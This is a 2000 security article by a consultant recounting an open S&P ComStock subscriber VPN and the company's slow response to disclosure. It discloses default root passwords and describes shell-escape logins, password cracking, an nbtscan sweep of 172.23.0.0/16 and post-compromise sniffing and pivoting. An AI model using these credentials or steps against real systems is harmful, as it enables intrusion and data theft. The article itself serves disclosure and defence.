Does this site look plain?

This site uses advanced css techniques

by Stephen J. Friedl, Network Consultant
Special to SecurityFocus.com
Summer 2000

Since at least December of 1999 — probably much longer — and until very recently, the Standard and Poors (S&P) ComStock data network has been open to allow essentially unlimited access between the internal networks of unrelated subscribers. This is a security nightmare of enormous proportions, but even more unbelievable is how S&P utterly ignored repeated and persistent notification of this vulnerability.

This is the story of how two unrelated security consultants tried, and ultimately succeeded, in getting this addressed only with the aid of very full disclosure.

Background

The S&P ComStock division sells a "Multi CSP" client-side processor machine that provides quote and stock feeds to (at least) hundreds of subscribers in the US, and perhaps internationally. Their service aggregates information from more than 100 sources and sends it to subscribers who in turn use this data for their own services.

Subscribers include stockbrokerages, news organizations, and major online companies. I was unable to find a vulnerable subscriber who would agree to be named for this story, but it's not hard to find plenty of web sites that identify S&P ComStock as the source of their news and quote feeds.

Data are provided via a satellite, ISDN modem, or dedicated circuit (ala' T1), and the customer premise equipment is a small Linux appliance with connections to both S&P and subscriber networks. The dedicated circuits (and perhaps ISDN) are part of a Virtual Private Network (VPN) provided by Concentric Networks, a major U.S. Internet provider. It's this "private" network that sits at the center of this story.

First Findings

In December 1999, Kevin Kadow of security consultancy MSG.net reviewed one of these machines at a client, and he found numerous problems. The machine itself was terribly insecure: root holes, unpassworded accounts, out of date operating system software, and generally no attention to security in any way. By itself this is a relatively minor matter, as these machines should be deep inside a company's protected network, far from the prying eyes of the internet users. But this is just the start of the problem.

MultiCSP machines linked via the VPN talk directly to S&P for their data feeds — of course — but appear to be able to talk to each other as well. This means that any one S&P subscriber can talk to any other S&P subscriber, and this arrangement opens the door for hacking and industrial espionage of unbelievable proportions.

Kevin recognized the importance of this problem and tried repeatedly to contact S&P, starting on 12 January 2000. He tried via email, phone, and fax and got exactly one confused response from an S&P person who wondered how Kevin got his name (from the "spcomstock.com" Internic domain name registration). He later reported on BugTraq:

"At that point I was nearly frustrated enough to march into ComStock's downtown Chicago office with a printout of the exploit details and cracked passwords, in hopes of personally delivering them to the first corporate officer I could find." - Kevin Kadow

Nothing came of this, so on 1 February 2000 he made the first of what were to be several BugTraq postings on this topic. His posting was firm but a bit vague: he later told me that he didn't want to give away everything, providing S&P with yet another chance to clean things up.

Either because of this posting or on their own accord, S&P seems to have taken some minor steps to secure their machines. Several reports, including one from Kevin, claimed that machines shipped since roughly March of this year have closed some of the more glaring problems, but these were mostly superficial. A moderately-skilled Linux user would not have been slowed down for long.

He made an an updated posting in March after he had access to a newer machine. During these postings I had no access to or interest in the MultiCSP system, so I didn't give it much of a thought.

The Audit

In May, I was retained by a client to perform a network security audit and penetration test, and it turned out that he had one of these machines. This was not a focus of the test: I simply tripped across it during my analysis. The telnet login banner clearly identified the machine for what it was:

Red Hat Linux release 5.1 (Manhattan)
Kernel 2.0.35 on an i686

MCSP - Standard & Poor's ComStock - The McGraw-Hill Companies

Multiuser CSP Login:
<alt><F1> login: screen
<alt><F#> login: showusers
<alt><F#> login: showlog
<alt><F#> login: netconfig
<alt><F#> login: isdnconfig
<alt><F#> login: helpmcsp
<alt><F#> login: helpicl
login:

For somebody who'd read Kevin's BugTraq posting, this was an alarm call, but even absent that information that it was an open invitation for hacking. Kevin had not posted the default passwords, but getting into this machine took remarkably little effort. The two "help" accounts had no passwords, and their use brought up the "more" program on some large help files. By using some simple shell escapes from more and vi a user-level shell was provided. The /etc/passwd file was not shadowed, so running the "Crack" program gave up root's password in very short order. The password was "c0mst0ck" (zero instead of oh).

I found the machine exactly as Kevin described: full of holes, and configured without regard for security. The operating system was out of date, but I understand that this was simply an older installation and that newer ones didn't have the neon "hack me" sign.

It appeared to be an out-of-the-box Red Hat Linux 5.1 installation, and this would explain many of the unnecessary services that were found running by default. But Samba, the daemon that emulates a Windows NT file server, was actively configured for each machine. The domain and machine name were set in the smb.conf file, though it's not at all clear that this is actually used in any production way. No shares were exported, and the Samba logfiles showed no activity of any kind.

Why they took the trouble to configure this service that seems to be unused remains a mystery, but having Samba around turned out to be helpful in the adventure that followed.

Going on Walkabout

Kevin's original posting made some fuzzy references to the private network, and sure enough, this machine was on it. The 172.23.x.x network is in IANA reserved class B space, and this suggested a very large range of addresses that might be used for S&P subscribers. I downloaded some of my tools for investigation and found this to be the case.

Since Samba was running on all MultiCSP machines, my NETBIOS scanner (nbtscan) was able to recognize them very quickly. I did scans for only limited subnets, but in retrospect I should have just scanned the entire class B space. At the time I wasn't sure how much of my activities would be detected: it turns out I needn't have worried.

#  nbtscan 172.23.0.0/16 

172.23.x.y    MYGROUP\CV55612            SHARING
172.23.x.y    MYGROUP\CV55765            SHARING
172.23.x.y    MYGROUP\CV54462            SHARING
172.23.x.y    MYGROUP\CV55225            SHARING
172.23.x.y    MYGROUP\CV55430            SHARING
172.23.x.y    MYGROUP\CV55431            SHARING
172.23.x.y    MYGROUP\CV55643            SHARING
172.23.x.y    MYGROUP\CV55642            SHARING
172.23.x.y    MYGROUP\CV55602            SHARING
172.23.x.y    MYGROUP\CV55625            SHARING
172.23.x.y    MYGROUP\CV60666            SHARING
172.23.x.y    MYGROUP\55209              SHARING
172.23.x.y    MYGROUP\CV54822            SHARING
172.23.x.y    MYGROUP\CV54457            SHARING
172.23.x.y    MYGROUP\CV55918            SHARING
172.23.x.y    MYGROUP\CV55900            SHARING
172.23.x.y    MYGROUP\CV54585            SHARING
172.23.x.y    MYGROUP\CV55962            SHARING
172.23.x.y    MYGROUP\CV55903            SHARING
172.23.x.y    MYGROUP\CV55902            SHARING

Each of these machines is a MultiCSP machine, and this is just a small number of machines in a few limited subnets. I expect that a full class B scan would have found at least a hundred of them. I also believe that "CV" is the S&P installation number: if you have one of these machines, you might have had a visitor recently.

I tested the machines listed here and found that many of them permitted login via the shell escapes and default "c0mst0ck" root password. Not all machines had the same full login banner nor permitted any immediate logins, but they were likely newer machines with different default passwords. Kevin later reported on BugTraq that the default passwords for these machines was "abcd1234", and from here it was just a minor step to root compromise. I'm confident that many of these machines could have been "owned" as well.

Once on one of these remote MultiCSP machine as root, the ifconfig command revealed that the non-VPN Ethernet card was on the subscriber's private network with 10.x.x.x or 192.168.x.x addresses. Though it's possible that some subscribers had properly firewalled these S&P systems (as described later), it's hard to believe that all of them were. My client had not secured his.

I was positively stunned by this: having root access on a Linux machine inside a "victim" network is an attack launchpad surpassed only by physical access to the facility and a gun to the sysadmin.

I didn't spend any time going beyond the MultiCSP machines on the subscriber networks themselves. I was certainly curious (of course), but there was simply no ethical justification for this intrusion: the fact that I could get to the subscriber's MultiCSP was evidence enough of the problem, and going beyond this would have been gratuitous.

We also found some odd behavior with respect just how "private" the VPN really is, as we saw clear evidence of private-address packets leaving the VPN and making it to the public internet. This strikes both of us as undesireable, but in fact neither Kevin nor I have any real knowledge of how this VPN is supposed to work. We don't know what kind of contract S&P has with Concentric, what kind of topology was designed, who is responsible for what parts, or if S&P even has Concentric's managed secure VPN product in the first place. They're not talking to me about any of this, so it seems inappropriate for me to speculate too strongly on whether this is wrong, unexpected, or even unintended. This is one of those things that I'll never know.

In any case, clearly Kevin had substantially understated — deliberately, it turned out — the impact of this problem, and there is simply no way that all these S&P subscribers were aware of the Trojan Horse in their midst. I was determined to get this fixed.

A close colleague works in the financial services industry, and he has many more contacts than I do; I sent him a long technical note on the dangers of these machines as a head's up for his security people. On 9 May 2000, he left a voicemail and email for David Brukman, the VP of Technology at S&P in New York. The email was:

Date: Tue, 9 May 2000 17:07:57 -0700 (PDT)
From: {colleague}
to: david_brukman@standardandpoors.com
cc: Stephen Friedl 
Subject: [steve@unixwiz.net: S&P ComStock stock-feed machines]

David, this is the note I mentioned in my voicemail. {Company} has
a number of these machines, so I'll be forwarding this note along
to our security people. If they need to contact someone at S&P,
whom should they talk to?

[Attached: my long detailed note]

He also contacted his San Francisco S&P representative by phone and email with instructions to run it up his flagpole, but we heard nothing from anybody. A week later I went public with my BugTraq posting entitled "Standard and Poors Security Nightmare". This was on Wednesday, 17 May 2000.

I got numerous responses from other BugTraq readers, including people who had essentially seen the same thing. During this week I made some minor but utterly unsuccessful attempts at garnering media attention, so I decided to just let it go.

On Tuesday, 23 May, a kind BugTraq reader forwarded a note he had received from S&P on the security issue. They didn't really address the VPN problem, but it is clear from this note that they are taking this seriously and they were taking exactly the right steps to secure the boxes themselves. This was very gratifying, and I thought this was to be the end of it.

An hour later I got a phone call from Paul Festa, a reporter from CNet. He had read my BugTraq posting and wanted clarification. I was of course happy to talk to him, and during the conversation it became clear that S&P believed that since the VPN was secure, the security of the box itself was not terribly critical.

This is an important point, and one S&P is fully correct on. If the VPN does not allow one subscriber endpoint to talk to another, it doesn't matter much whether the box is wide open or not because access from "outside" the trusted zone simply is not permitted. I believe S&P was (and perhaps still is) mistaken in their belief that the VPN is secure in that way.

Mr. Festa and I had several phone calls and emails on this subject, and a bit later an email from him said that David Brukman would be contacting me later in the day. It would be the first contact of any kind I'd have from S&P.

He did call, but as I was still under nondisclosure with my client, I had to be vague to him on some of the details of my adventures so as not to identify who had hired me. My client had not quite yet secured his own network, and he asked that I keep this private for now.

I had the impression that Mr. Brukman was not convinced that I could do what I did, so I gave him the IP address (on the VPN) of one machine I know was open to this attack from other parts of the S&P network. I also sent him the source code to the nbtscan tool I used to scan the network, and shortly thereafter he sent a polite "thankyou" response via email saying he would pass this to his engineers for investigation.

During the call Mr. Brukman offered that my speculation of where I'd been — the Netherlands and Singapore — was not correct, as they don't offer VPN services in those areas. I had gone enormously out on a limb with these weak speculations due to extremely limited information available, and I'm glad he has corrected the record. I suspect that my walkabout was limited to the United States.

At around the same time I got an email query from Elizabeth Coolbaugh at Linux Weekly News. At the time I thought it was related to the CNet research, but they were parallel unrelated inquiries.

Let the Spin Begin

The next morning (Wed 24 May) the cnet.com story hit the news, and in it Mr. Brukman is quoted as saying:

"If customers can reach from one endpoint to another, it's a concern," said David Brukman, vice president of technology for S&P's ComStock. "That would be a Concentric concern.... It's possible they have made a mistake and let one customer see another."

Clearly he understands that endpoint-to-endpoint connectivity would be a problem, but then seeks to blame Concentric for it. My hunch is that this is also S&P's fault, but (as mentioned before) I simply don't know enough to make a real judgment.

Later Wednesday evening, this story was covered by Linux Weekly News, and it took the angle of S&P's response more than the explicit security issue.

On Thursday, 25 May, Mr. Brukman contacted my client to ask about "security breaches" from his MultiCSP machine. Either with the information I had provided or by their own research, they had found where the "attacks" had come from. S&P had identified several machines and time frames that all corresponded with my activities, so after consulting with me, my client confirmed that this was part of an authorized network audit.

Later that day (Thursday) I got a call from Jaikumar Vijayan of Computerworld on this same story. As with the CNet reporter, we corresponded several times, and in all cases I urged the reporter to talk with Kevin Kadow also: he could independently confirm much of what I'd found. Kevin and I have no relationship other than a casual one that has developed over this story.

As an amusing aside, I submitted a written report to my client at about the time of the BugTraq posting, and it included recommended steps to secure the MultiCSP machine. Some time later, I got paged by my client's sysadmin who had received my audit report: he reported that he couldn't get into his MultiCSP via the root account. It turned out that a different sysadmin, one who wasn't aware of the audit, saw the BugTraq posting and was securing the machine at the same time: he'd just changed the root password independently. He was surprised to learn that the network being described on BugTraq was his network, and the two admins then took steps to secure the machine together.

S&P contacted my client on Thursday and was "concerned" about the client having made those "unauthorized changes" to the system, which is S&P property. Apparently they could not get into the machine any longer. My client explained that it was simply a defensive maneuver in response to the BugTraq posting.

I have the impression that S&P was making these changes on a systematic basis across their subscriber base, and my client reports that S&P support has really been very proactive on this front. I welcome this wholeheartedly, although it's long overdue.

My client also released me from nondisclosure with respect to S&P, so on Friday 26 May I sent Mr. Brukman a very long email that detailed all of my actions and findings, including IP addresses seen and steps taken. He had commented to my client that I'd been evasive on the phone earlier in the week, and with the NDA release I could now clear the air. I was being very tough on S&P in the press, but it would serve no purpose to keep them in the dark about my activities.

On Friday afternoon, the Computerworld article hit their web site, and in it Mr. Brukman is quoted as saying:

"It is possible that at some point in the past, the consultant may have found some flaw in the network, but the latest audit indicates the network is secure."

My most recent "walkabout" had been on or about 15 May, so it was not in that far in the past that these vulnerabilities were still present, and S&P had been notified at least five months earlier of them.

I believe that S&P is simply "spinning" this to the press to cast doubt on the reports of an unknown consultant, and in the face of the news coverage they were getting, I'm not sure that I fault them for it. Who knows what kind of liability they were looking at?

A Potential Hacking Orgy

Kevin and I are ethical security consultants, and as such we were very careful as to what we did on remote S&P subscriber machines: working independently, we gathered just enough information to be sure of what we saw without actually hurting anything. But the potential for abuse was simply enormous.

Access to this machine could be likened to showing up inside the secure area of a secret government building. Normally the only people in this area are those that have gone past several security checkpoints, so if you are here it means you should be here. Doors aren't typically locked on this floor, because all the users are trusted.

The MultiCSP machine provides this kind of platform. From this compromised system it is an easy matter to download the usual scanning toolkits, and nmap by Fyodor (http://www.insecure.org) is one of the first choices. This is the premiere network scanning tool for Linux, and it allows a user to gather extensive information on the local network. It can identify which machines are visible and what operating system are run.

It's also easy to run a network sniffer to quietly collect passwords as they travel by the local Ethernet, and "interesting" ones will turn up eventually. This includes UNIX telnet logins, Windows NT login passwords, database passwords, and even router/firewall passwords now and then. Patience is rewarded on this front.

It's just a matter of time before the intruder has a very detailed "map" of the local network, including passwords to nearly everything. From there he can take what he likes. Client software for most major databases (DB2, Oracle, and others) is available for Linux, so making a surreptitious connection to the company's internal database would yield all the data found within: this might even include credit card numbers, one of holy grails of the cracker community.

It is hard to place any real limits on what could be done from this launching point inside the subscriber's network. Even if the subscriber does fully detect the bad guy and secure the machine, there are still perhaps dozens of other unrelated subscribers who would prove to be open to this attack via the S&P VPN.

What I didn't explore, and what Kevin probably didn't either, is just what could be done to the S&P machines themselves. It is not out of the question that the "source" machine for the quote/news data could be compromised and shenanigans played with the data fed to all subscribers. Perhaps stock quotes could be altered? I don't think this is likely, because even though S&P believed that VPN endpoints were secure, it's hard to believe that they didn't harden their own servers from their own subscribers. But it's a question to be asked.

Normally these machines are accessible only by S&P subscribers, so at first it seems that the only exposure is by their staff. Though these companies are typically competitors, there are limits to what even an aggressive competitor will do to another even if given the chance. The larger point is that the entire S&P subscriber base was only as secure as the least secure other subscriber. It would not be out of the question for a smaller — and probably less well armored — subscriber to be targeted by an attacker simply for access to the S&P network. From there it would be a free-for-all of information gathering.

What S&P Did Wrong

Everybody makes mistakes, but the real measure is how one responds to that mistake when it's discovered or pointed out. The initial oversight of deploying an insecure network is not really worthy of the beating that S&P is taking in the press, but their ignoring of repeated and persistent reports of this problem does make it warranted. I see several failings, each discussed in turn.

They deployed a grossly insecure Linux machine
This is the one that S&P has been forthcoming on: assuming the VPN is secure, the security of the end-user machine is not terribly important. In this I fully agree with S&P. I'd still have prefered that the machines be secure from casual passers by, which would cut down poking around from curious subscriber staff. But this is not a terribly big deal by itself.
They deployed a VPN that provided endpoint-to-endpoint connectivity
It is clear to me that the VPN permitted walkabout all over their network, and this is an enormous hole. I believe that S&P simply didn't give a thought to this matter and assumed that either Concentric was somehow handling this or that nobody else would notice. It turns out they chose poorly.
They apparently failed to perform any audit
This follows from #2 — if they didn't set it up securely, they obviously didn't check it after the fact. Good security practices dictate regular audits to make sure that things don't slip through the cracks. It turns out that they got an audit, but it was done by their customer. Ouch.

There doesn't seem to be any evidence of an IDS (Intrusion Detection System) on the network
Kevin and I, and probably others, performed numerous very noisy scans of the 172.23.*.* address space, and it's not clear that anybody noticed. During walkabout of the network we noticed Bay Network routers (presumably owned by Concentric), plus I have seen the output of a full nmap scan of the entire class B network. Nmap is as subtle as a tornado, and it's hard to believe that nobody noticed this. Unbelievable.
They ignored repeated notifications, even at the highest level
In my view, this is by far the most critical failure. It's easy enough to make a mistake of omission, and even the best security consultants drop the ball now and then. But to ignore repeated reports of an enormous security hole, either out of ignorance, disbelief, or a desire for the problem to just go away is foolish.
Starting in at least January, they were notified numerous times of this problem and took no apparent action other than to slightly shore up the security of the MultiCSP machines. These actions were minimal and didn't contribute very much to any real security. I don't know if they were related to Kevin's BugTraq activity or notifications.
The BugTraq postings in February/March were a clear wake-up call to S&P, and I have it from a reliable source that Mr. Brukman was notified personally during this time frame. As far as any of us can tell, no actions were taken.
David Brukman was again notified by phone and by email in May by my close colleague, and (again) nothing happened as far as I can see. It's hard to imagine getting more blown off than this. All of us made substantial efforts to report this before going public. It's only fair.
Mr. Brukman's response to the press has been to deny that this is a problem and then to blame Concentric for it. I have enough experience with security consulting to dismiss his dismissals out of hand: I know what I saw. My claims have always been based on tests that could easily be reproduced, both from S&P's network control center or by any S&P subscriber. This story is just too easy to check to be dismissed so easily.
It's always possible that Kevin's early reports were to low-level staffers who simply didn't understand the issues, though I believe that anybody in the financial services industry should have immediately tuned into the security warning and found somebody appropriate to investigate.

I believe that this failure was a team effort on the part of S&P. The combination of bad actions (terrible security) and bad inactions (totally ignoring the reports from all angles) contributed to the miserable security situtation and the bad PR they're getting lately.

We'll probably never hear the S&P side of the story, but I believe actions — and inactions — largely speak for themselves.

Protecting yourself

In the last two weeks, S&P have made substantial efforts to secure these machines, but I have no reports of any action taken on the VPN front. I have lost all access to the MultiCSP machine to perform additional tests, but even if it's been secured, how long will this last? Are we confident that S&P will stay on top of this forever?

I wouldn't bet the farm against a repeat of the past, so I have recommended to my client that he firewall the unit from the rest of his network. This machine is simply not to be trusted, so by installing a small firewall router between the MultiCSP unit and his network, the opportunities for penetration are drastically reduced.

I believe that the MultiCSP is listening on just a few TCP ports and that it need not ever "reach out" to the subscriber network on its own. This being the case, an inexpensive Netopia R9100 Ethernet-to-Ethernet router can sit between the two devices and treat the MultiCSP as "on the outside". These cost less than $500 "on the street", and they are a breeze to configure.

Disclaimer — I don't sell hardware or software: I'm just a very happy Netopia customer.

By configuring the Network Address Translation (NAT) facilities, there is a one-way path from the subscriber network to the MultiCSP, and even a fully root-compromised MultiCSP machine simply won't see anything on the subscriber network. This low-cost arrangement means that you're not trusting S&P for anything other than their news/quote data itself.

Conclusions

It is my firm belief that S&P acted on this only because of the full-disclosure posting to BugTraq. Kevin Kadow, who saw essentially the same thing that I did, gave a watered-down posting of the dangers in the hopes of getting S&P's attention without giving the bad guys a road map for how to hack the S&P network. It's not clear that it had any meaningful effect.

Before my posting, I had quietly asked for advice from others in the security community whether I should post the actual passwords and literal steps for breakin. The consensus was that since Kevin had broken ground on this previously and that S&P was apparently not interested in the matter, a wakeup call was in order. I was told more than once to "roast 'em".

S&P went into high gear shortly after my BugTraq posting hit the list. It's not clear to us whether they were responding to the posting itself, press queries about it, or subscriber questions/complaints. I'll probably never know for sure, but the timeline gives a clue.

The BugTraq posting was released on May 16, and Linux Weekly News asked S&P for a comment shortly thereafter. CNet reporter Paul Festa started poking around on this story (I believe) early in the week of May 22, and on May 24 S&P sent a security letter to their subscriber base. The S&P letter was before I was aware of any press activities.

The S&P security letter was so perfectly on target that I find it hard to believe that it was put together in haste in a day. This suggests that it was in the works (at least) the week before and that the CNet queries were not the catalyst for their action. My hunch is that that BugTraq posting was the key, and perhaps their seeing their root passwords posted on the Internet got their attention.

I continue to support full disclosure with vendor pre-notification. A responsible vendor will act on the advisory and be grateful for a good report and the opportunity to address it. I got neither of these from S&P, so going public in a vocal way was the last resort, and what seems to have been effective.